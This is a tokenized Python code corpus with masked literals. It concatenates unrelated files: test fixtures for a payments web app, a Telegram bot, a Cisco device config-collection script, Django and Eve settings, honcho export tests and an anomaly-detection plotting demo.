'<STR_LIT:password>' <EOL> } , <EOL> { <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:email>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT:password>' <EOL> } <EOL> ] <EOL> for user in users : <EOL> db . session . add ( User ( ** user ) ) <EOL> db . session . commit ( ) <EOL> return db <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def issues ( db ) : <EOL> """<STR_LIT>""" <EOL> db . session . query ( Issue ) . delete ( ) <EOL> issues = [ <EOL> { <EOL> '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT:email>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:status>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> '<STR_LIT:label>' : '<STR_LIT>' , <EOL> '<STR_LIT:email>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:status>' : '<STR_LIT>' <EOL> } <EOL> ] <EOL> for issue in issues : <EOL> db . session . add ( Issue ( ** issue ) ) <EOL> db . session . commit ( ) <EOL> return db <EOL> @ pytest . 
fixture ( scope = '<STR_LIT>' ) <EOL> def credit_cards ( db ) : <EOL> """<STR_LIT>""" <EOL> db . session . query ( CreditCard ) . delete ( ) <EOL> may_29_2015 = datetime . date ( <NUM_LIT> , <NUM_LIT:0> <NUM_LIT:5> , <NUM_LIT> ) <EOL> june_29_2015 = datetime . datetime ( <NUM_LIT> , <NUM_LIT:0> <NUM_LIT:6> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> june_29_2015 = pytz . utc . localize ( june_29_2015 ) <EOL> credit_cards = [ <EOL> { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : june_29_2015 <EOL> } , <EOL> { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : timedelta_months ( <NUM_LIT:12> , may_29_2015 ) <EOL> } <EOL> ] <EOL> for card in credit_cards : <EOL> db . session . add ( CreditCard ( ** card ) ) <EOL> db . session . commit ( ) <EOL> return db <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def coupons ( db ) : <EOL> """<STR_LIT>""" <EOL> db . session . query ( Coupon ) . delete ( ) <EOL> may_29_2015 = datetime . datetime ( <NUM_LIT> , <NUM_LIT:0> <NUM_LIT:5> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> may_29_2015 = pytz . utc . localize ( may_29_2015 ) <EOL> june_29_2015 = datetime . datetime ( <NUM_LIT> , <NUM_LIT:0> <NUM_LIT:6> , <NUM_LIT> ) <EOL> june_29_2015 = pytz . utc . localize ( june_29_2015 ) <EOL> coupons = [ <EOL> { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : may_29_2015 <EOL> } , <EOL> { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : june_29_2015 <EOL> } , <EOL> { <EOL> '<STR_LIT>' : <NUM_LIT:1> <EOL> } <EOL> ] <EOL> for coupon in coupons : <EOL> db . session . add ( Coupon ( ** coupon ) ) <EOL> db . session . commit ( ) <EOL> return db <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def subscriptions ( db ) : <EOL> """<STR_LIT>""" <EOL> subscriber = User . find_by_identity ( '<STR_LIT>' ) <EOL> if subscriber : <EOL> subscriber . 
delete ( ) <EOL> db . session . query ( Subscription ) . delete ( ) <EOL> params = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:email>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT:password>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> admin = User ( ** params ) <EOL> db . session . add ( admin ) <EOL> db . session . commit ( ) <EOL> params = { <EOL> '<STR_LIT>' : admin . id , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> subscription = Subscription ( ** params ) <EOL> db . session . add ( subscription ) <EOL> params = { <EOL> '<STR_LIT>' : admin . id , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : datetime . date ( <NUM_LIT> , <NUM_LIT:0> <NUM_LIT:6> , <NUM_LIT:0> <NUM_LIT:1> ) <EOL> } <EOL> credit_card = CreditCard ( ** params ) <EOL> db . session . add ( credit_card ) <EOL> db . session . commit ( ) <EOL> return db <EOL> @ pytest . fixture ( scope = '<STR_LIT>' ) <EOL> def mock_stripe ( ) : <EOL> """<STR_LIT>""" <EOL> PaymentCoupon . create = Mock ( return_value = { } ) <EOL> PaymentCoupon . delete = Mock ( return_value = { } ) <EOL> PaymentEvent . retrieve = Mock ( return_value = { } ) <EOL> PaymentCard . update = Mock ( return_value = { } ) <EOL> PaymentSubscription . create = Mock ( return_value = { } ) <EOL> PaymentSubscription . update = Mock ( return_value = { } ) <EOL> PaymentSubscription . 
cancel = Mock ( return_value = { } ) <EOL> upcoming_api = { <EOL> '<STR_LIT:date>' : <NUM_LIT> , <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:data>' : [ <EOL> { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:object>' : '<STR_LIT>' , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:start>' : <NUM_LIT> , <EOL> '<STR_LIT:end>' : <NUM_LIT> <EOL> } , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:object>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : { <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT:description>' : None , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { <EOL> } <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT:object>' : '<STR_LIT:list>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:object>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> 
'<STR_LIT>' : None , <EOL> '<STR_LIT>' : { <EOL> } , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT:description>' : None , <EOL> '<STR_LIT>' : None <EOL> } <EOL> PaymentInvoice . upcoming = Mock ( return_value = upcoming_api ) </s>
<s> import sys <EOL> import telepot <EOL> from telepot . delegate import per_chat_id , create_open <EOL> """<STR_LIT>""" <EOL> class MessageCounter ( telepot . helper . ChatHandler ) : <EOL> def __init__ ( self , seed_tuple , timeout ) : <EOL> super ( MessageCounter , self ) . __init__ ( seed_tuple , timeout ) <EOL> self . _count = <NUM_LIT:0> <EOL> def on_chat_message ( self , msg ) : <EOL> self . _count += <NUM_LIT:1> <EOL> self . sender . sendMessage ( self . _count ) <EOL> TOKEN = sys . argv [ <NUM_LIT:1> ] <EOL> bot = telepot . DelegatorBot ( TOKEN , [ <EOL> ( per_chat_id ( ) , create_open ( MessageCounter , timeout = <NUM_LIT:10> ) ) , <EOL> ] ) <EOL> bot . message_loop ( run_forever = True ) </s>
<s> import threading <EOL> import time <EOL> import datetime <EOL> import re <EOL> import os <EOL> import ciscolib <EOL> PASSWORD = '<STR_LIT>' <EOL> USERNAME = '<STR_LIT>' <EOL> USER_PASSWORD = '<STR_LIT>' <EOL> models = [ ] <EOL> models_lock = threading . Lock ( ) <EOL> class Grabber ( threading . Thread ) : <EOL> def __init__ ( self , host ) : <EOL> threading . Thread . __init__ ( self ) <EOL> self . host = host <EOL> def run ( self ) : <EOL> try : <EOL> device = ciscolib . Device ( self . host , PASSWORD ) <EOL> device . connect ( ) <EOL> except ciscolib . AuthenticationError : <EOL> try : <EOL> device = ciscolib . Device ( self . host , USER_PASSWORD , USERNAME ) <EOL> device . connect ( ) <EOL> except : <EOL> print ( "<STR_LIT>" % self . host ) <EOL> return <EOL> except : <EOL> print ( "<STR_LIT>" % self . host ) <EOL> return <EOL> try : <EOL> model = device . get_model ( ) <EOL> except ciscolib . ModelNotSupported : <EOL> print ( "<STR_LIT>" % self . host ) <EOL> return <EOL> if model in models : <EOL> return <EOL> else : <EOL> with models_lock : <EOL> models . append ( model ) <EOL> output_dir = '<STR_LIT>' % model <EOL> try : <EOL> os . mkdir ( output_dir ) <EOL> except OSError as e : <EOL> if e . errno != <NUM_LIT> : <EOL> print ( "<STR_LIT>" % output_dir ) <EOL> return <EOL> open ( output_dir + "<STR_LIT>" , '<STR_LIT:w>' ) . write ( device . cmd ( "<STR_LIT>" ) ) <EOL> open ( output_dir + "<STR_LIT>" , '<STR_LIT:w>' ) . write ( device . cmd ( "<STR_LIT>" ) ) <EOL> open ( output_dir + "<STR_LIT>" , '<STR_LIT:w>' ) . write ( device . cmd ( "<STR_LIT>" ) ) <EOL> open ( output_dir + "<STR_LIT>" , '<STR_LIT:w>' ) . write ( device . cmd ( "<STR_LIT>" ) ) <EOL> mac_data = '<STR_LIT>' <EOL> mac_cmd = '<STR_LIT>' <EOL> try : <EOL> mac_cmd = '<STR_LIT>' <EOL> mac_data = device . cmd ( mac_cmd ) <EOL> except ciscolib . InvalidCommand : <EOL> try : <EOL> mac_cmd = '<STR_LIT>' <EOL> mac_data = device . 
cmd ( mac_cmd ) <EOL> except : <EOL> print ( "<STR_LIT>" % self . host ) <EOL> if mac_data != '<STR_LIT>' : <EOL> open ( output_dir + mac_cmd . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) + "<STR_LIT>" , '<STR_LIT:w>' ) . write ( mac_data ) <EOL> interfaces_re = "<STR_LIT>" <EOL> interfaces = device . cmd ( "<STR_LIT>" ) <EOL> open ( output_dir + "<STR_LIT>" , '<STR_LIT:w>' ) . write ( interfaces ) <EOL> for result in re . findall ( interfaces_re , interfaces ) : <EOL> filename = "<STR_LIT>" % result <EOL> filename = filename . replace ( "<STR_LIT:/>" , "<STR_LIT:+>" ) <EOL> open ( output_dir + filename , '<STR_LIT:w>' ) . write ( device . cmd ( "<STR_LIT>" % result ) ) <EOL> grabber_pool = [ ] <EOL> for ip in open ( '<STR_LIT>' ) : <EOL> print ( "<STR_LIT>" % ip ) <EOL> t = Grabber ( ip ) <EOL> t . start ( ) <EOL> grabber_pool . append ( t ) <EOL> while len ( grabber_pool ) >= <NUM_LIT:20> : <EOL> [ grabber_pool . remove ( thread ) for thread in grabber_pool if not thread . is_alive ( ) ] <EOL> time . sleep ( <NUM_LIT> ) <EOL> while len ( grabber_pool ) > <NUM_LIT:0> : <EOL> [ grabber_pool . remove ( thread ) for thread in grabber_pool if not thread . is_alive ( ) ] <EOL> time . sleep ( <NUM_LIT> ) <EOL> print ( "<STR_LIT>" % str ( models ) ) </s>
<s> from settings import INSTALLED_APPS <EOL> DEBUG = False <EOL> DATABASE_ENGINE = '<STR_LIT>' <EOL> DATABASE_NAME = '<STR_LIT>' <EOL> DATABASE_USER = '<STR_LIT>' <EOL> DATABASE_PASSWORD = '<STR_LIT>' <EOL> TIME_ZONE = '<STR_LIT>' <EOL> SECRET_KEY = '<STR_LIT>' <EOL> INSTALLED_APPS += ( '<STR_LIT>' , ) </s>
<s> import os <EOL> import pytest <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ { <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } ] , indirect = True ) <EOL> def test_export_supervisord ( testenv ) : <EOL> ret , out , err = testenv . run_honcho ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> testenv . path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ] ) <EOL> expected = testenv . path ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> assert ret == <NUM_LIT:0> <EOL> assert os . path . exists ( expected ) <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ { <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } ] , indirect = True ) <EOL> def test_export_upstart ( testenv ) : <EOL> ret , out , err = testenv . run_honcho ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> testenv . path ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ] ) <EOL> assert ret == <NUM_LIT:0> <EOL> for filename in ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> expected = testenv . path ( '<STR_LIT>' , filename ) <EOL> assert os . path . exists ( expected ) <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : """<STR_LIT>""" <EOL> } ] , indirect = True ) <EOL> def test_export_upstart_environment ( testenv ) : <EOL> ret , out , err = testenv . run_honcho ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> testenv . path ( '<STR_LIT:test>' ) , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ] ) <EOL> assert ret == <NUM_LIT:0> <EOL> lines = open ( testenv . path ( '<STR_LIT:test>' , '<STR_LIT>' ) ) . readlines ( ) <EOL> assert '<STR_LIT>' in lines <EOL> assert "<STR_LIT>" in lines <EOL> assert "<STR_LIT>" in lines <EOL> assert "<STR_LIT>" in lines <EOL> assert "<STR_LIT>" in lines <EOL> assert "<STR_LIT>" in lines <EOL> assert "<STR_LIT>" in lines <EOL> assert "<STR_LIT>" in lines </s>
<s> import cvxopt as co <EOL> import numpy as np <EOL> import pylab as pl <EOL> import matplotlib . pyplot as plt <EOL> import math <EOL> from ssad import SSAD <EOL> from ocsvm import OCSVM <EOL> from mkl import MKLWrapper <EOL> from kernel import Kernel <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> """<STR_LIT>""" <EOL> P_NORM = <NUM_LIT> <EOL> N_pos = <NUM_LIT:100> <EOL> N_neg = <NUM_LIT:100> <EOL> N_unl = <NUM_LIT:200> <EOL> yp = co . matrix ( <NUM_LIT:1> , ( <NUM_LIT:1> , N_pos ) , '<STR_LIT:i>' ) <EOL> yu = co . matrix ( <NUM_LIT:0> , ( <NUM_LIT:1> , N_unl ) , '<STR_LIT:i>' ) <EOL> yn = co . matrix ( - <NUM_LIT:1> , ( <NUM_LIT:1> , N_neg ) , '<STR_LIT:i>' ) <EOL> Dy = co . matrix ( [ [ yp ] , [ yu ] , [ yn ] , [ yn ] , [ yn ] , [ yn ] ] ) <EOL> co . setseed ( <NUM_LIT:11> ) <EOL> Dtrainp = co . normal ( <NUM_LIT:2> , N_pos ) * <NUM_LIT> <EOL> Dtrainu = co . normal ( <NUM_LIT:2> , N_unl ) * <NUM_LIT> <EOL> Dtrainn = co . normal ( <NUM_LIT:2> , N_neg ) * <NUM_LIT> <EOL> Dtrain21 = Dtrainn - <NUM_LIT:1> <EOL> Dtrain21 [ <NUM_LIT:0> , : ] = Dtrainn [ <NUM_LIT:0> , : ] + <NUM_LIT:1> <EOL> Dtrain22 = - Dtrain21 <EOL> Dtrain = co . matrix ( [ [ Dtrainp ] , [ Dtrainu ] , [ Dtrainn + <NUM_LIT:1.0> ] , [ Dtrainn - <NUM_LIT:1.0> ] , [ Dtrain21 ] , [ Dtrain22 ] ] ) <EOL> kernel1 = Kernel . get_kernel ( Dtrain , Dtrain , type = '<STR_LIT>' , param = <NUM_LIT:1.0> ) <EOL> kernel2 = Kernel . get_kernel ( Dtrain , Dtrain , type = '<STR_LIT>' , param = <NUM_LIT:1.0> / <NUM_LIT> ) <EOL> kernel3 = Kernel . get_kernel ( Dtrain , Dtrain , type = '<STR_LIT>' , param = <NUM_LIT:1.0> / <NUM_LIT> ) <EOL> kernel4 = Kernel . get_kernel ( Dtrain , Dtrain , type = '<STR_LIT>' ) <EOL> ad = SSAD ( [ ] , Dy , <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> / ( N_unl * <NUM_LIT> ) , <NUM_LIT:1.0> ) <EOL> ssad = MKLWrapper ( ad , [ kernel1 , kernel2 , kernel3 , kernel4 ] , Dy , P_NORM ) <EOL> ssad . train_dual ( ) <EOL> kernel1 = Kernel . get_kernel ( Dtrain , Dtrain [ : , ssad . 
get_support_dual ( ) ] , type = '<STR_LIT>' , param = <NUM_LIT:1.0> ) <EOL> kernel2 = Kernel . get_kernel ( Dtrain , Dtrain [ : , ssad . get_support_dual ( ) ] , type = '<STR_LIT>' , param = <NUM_LIT:1.0> / <NUM_LIT> ) <EOL> kernel3 = Kernel . get_kernel ( Dtrain , Dtrain [ : , ssad . get_support_dual ( ) ] , type = '<STR_LIT>' , param = <NUM_LIT:1.0> / <NUM_LIT> ) <EOL> kernel4 = Kernel . get_kernel ( Dtrain , Dtrain [ : , ssad . get_support_dual ( ) ] , type = '<STR_LIT>' , ) <EOL> thres = np . array ( ssad . get_threshold ( ) ) [ <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> pred = ssad . apply_dual ( [ kernel1 , kernel2 , kernel3 , kernel4 ] ) <EOL> pred = np . array ( pred ) <EOL> pred = pred . transpose ( ) <EOL> delta = <NUM_LIT:0.1> <EOL> x = np . arange ( - <NUM_LIT> , <NUM_LIT> , delta ) <EOL> y = np . arange ( - <NUM_LIT> , <NUM_LIT> , delta ) <EOL> X , Y = np . meshgrid ( x , y ) <EOL> ( sx , sy ) = X . shape <EOL> Xf = np . reshape ( X , ( <NUM_LIT:1> , sx * sy ) ) <EOL> Yf = np . reshape ( Y , ( <NUM_LIT:1> , sx * sy ) ) <EOL> Dtest = np . append ( Xf , Yf , axis = <NUM_LIT:0> ) <EOL> print ( Dtest . shape ) <EOL> kernel1 = Kernel . get_kernel ( co . matrix ( Dtest ) , Dtrain [ : , ssad . get_support_dual ( ) ] , type = '<STR_LIT>' , param = <NUM_LIT:1.0> ) <EOL> kernel2 = Kernel . get_kernel ( co . matrix ( Dtest ) , Dtrain [ : , ssad . get_support_dual ( ) ] , type = '<STR_LIT>' , param = <NUM_LIT:1.0> / <NUM_LIT> ) <EOL> kernel3 = Kernel . get_kernel ( co . matrix ( Dtest ) , Dtrain [ : , ssad . get_support_dual ( ) ] , type = '<STR_LIT>' , param = <NUM_LIT:1.0> / <NUM_LIT> ) <EOL> kernel4 = Kernel . get_kernel ( co . matrix ( Dtest ) , Dtrain [ : , ssad . get_support_dual ( ) ] , type = '<STR_LIT>' ) <EOL> res = ssad . apply_dual ( [ kernel1 , kernel2 , kernel3 , kernel4 ] ) <EOL> Z = np . reshape ( res , ( sx , sy ) ) <EOL> plt . figure ( ) <EOL> plt . contourf ( X , Y , Z , <NUM_LIT:20> ) <EOL> plt . contour ( X , Y , Z , [ np . array ( ssad . 
get_threshold ( ) ) [ <NUM_LIT:0> , <NUM_LIT:0> ] ] ) <EOL> plt . scatter ( Dtrain [ <NUM_LIT:0> , ssad . get_support_dual ( ) ] , Dtrain [ <NUM_LIT:1> , ssad . get_support_dual ( ) ] , <NUM_LIT> , c = '<STR_LIT:w>' ) <EOL> plt . scatter ( Dtrain [ <NUM_LIT:0> , N_pos : N_pos + N_unl - <NUM_LIT:1> ] , Dtrain [ <NUM_LIT:1> , N_pos : N_pos + N_unl - <NUM_LIT:1> ] , <NUM_LIT:10> , c = '<STR_LIT:g>' ) <EOL> plt . scatter ( Dtrain [ <NUM_LIT:0> , <NUM_LIT:0> : N_pos ] , Dtrain [ <NUM_LIT:1> , <NUM_LIT:0> : N_pos ] , <NUM_LIT:20> , c = '<STR_LIT:r>' ) <EOL> plt . scatter ( Dtrain [ <NUM_LIT:0> , N_pos + N_unl : ] , Dtrain [ <NUM_LIT:1> , N_pos + N_unl : ] , <NUM_LIT:20> , c = '<STR_LIT:b>' ) <EOL> plt . figure ( ) <EOL> plt . bar ( [ i + <NUM_LIT:1> for i in range ( <NUM_LIT:4> ) ] , ssad . get_mixing_coefficients ( ) ) <EOL> plt . show ( ) <EOL> print ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> from eve import Eve <EOL> from eve . auth import BasicAuth <EOL> class MyBasicAuth ( BasicAuth ) : <EOL> def check_auth ( self , username , password , allowed_roles , resource , method ) : <EOL> return username == '<STR_LIT>' and password == '<STR_LIT>' <EOL> app = Eve ( auth = MyBasicAuth ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> app . run ( ) </s>
<s> """<STR_LIT>""" <EOL> from eve . methods . get import get , getitem <EOL> from eve . methods . post import post <EOL> from eve . methods . patch import patch <EOL> from eve . methods . put import put <EOL> from eve . methods . delete import delete , deleteitem </s>
<s> import copy <EOL> MONGO_HOST = '<STR_LIT:localhost>' <EOL> MONGO_PORT = <NUM_LIT> <EOL> MONGO_USERNAME = MONGO1_USERNAME = '<STR_LIT>' <EOL> MONGO_PASSWORD = MONGO1_PASSWORD = '<STR_LIT>' <EOL> MONGO_DBNAME , MONGO1_DBNAME = '<STR_LIT>' , '<STR_LIT>' <EOL> ID_FIELD = '<STR_LIT>' <EOL> RESOURCE_METHODS = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' , '<STR_LIT>' ] <EOL> ITEM_METHODS = [ '<STR_LIT:GET>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ITEM_CACHE_CONTROL = '<STR_LIT>' <EOL> ITEM_LOOKUP = True <EOL> ITEM_LOOKUP_FIELD = ID_FIELD <EOL> disabled_bulk = { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' <EOL> } <EOL> } <EOL> } <EOL> contacts = { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:20> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT:username>' : { '<STR_LIT>' : False } } } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:list>' , <EOL> '<STR_LIT>' : [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:list>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : <NUM_LIT:10> } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } , <EOL> } , <EOL> } , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> 
'<STR_LIT:type>' : '<STR_LIT:list>' , <EOL> '<STR_LIT>' : [ { '<STR_LIT:type>' : '<STR_LIT:string>' } , { '<STR_LIT:type>' : '<STR_LIT>' } , ] <EOL> } , <EOL> '<STR_LIT:location>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:address>' : { '<STR_LIT:type>' : '<STR_LIT:string>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : True } <EOL> } , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True <EOL> } , <EOL> '<STR_LIT:title>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT:default>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:list>' , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:list>' , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT>' : { '<STR_LIT:id>' : { '<STR_LIT:type>' : '<STR_LIT>' } } } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:list>' , <EOL> '<STR_LIT>' : [ { '<STR_LIT:type>' : '<STR_LIT>' } ] <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT:default>' : '<STR_LIT:default>' <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:value>' } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT:default>' : '<STR_LIT:default>' , <EOL> '<STR_LIT>' : True <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> '<STR_LIT:default>' : '<STR_LIT:default>' , <EOL> '<STR_LIT>' : True <EOL> } <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> 
'<STR_LIT:type>' : '<STR_LIT:string>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT:string>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT:type>' : '<STR_LIT>' } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT:float>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } <EOL> users = copy . deepcopy ( contacts ) <EOL> users [ '<STR_LIT:url>' ] = '<STR_LIT>' <EOL> users [ '<STR_LIT>' ] = { '<STR_LIT:source>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT:username>' : { '<STR_LIT>' : True } } , <EOL> '<STR_LIT>' : { '<STR_LIT:username>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } } <EOL> users [ '<STR_LIT>' ] [ '<STR_LIT:username>' ] 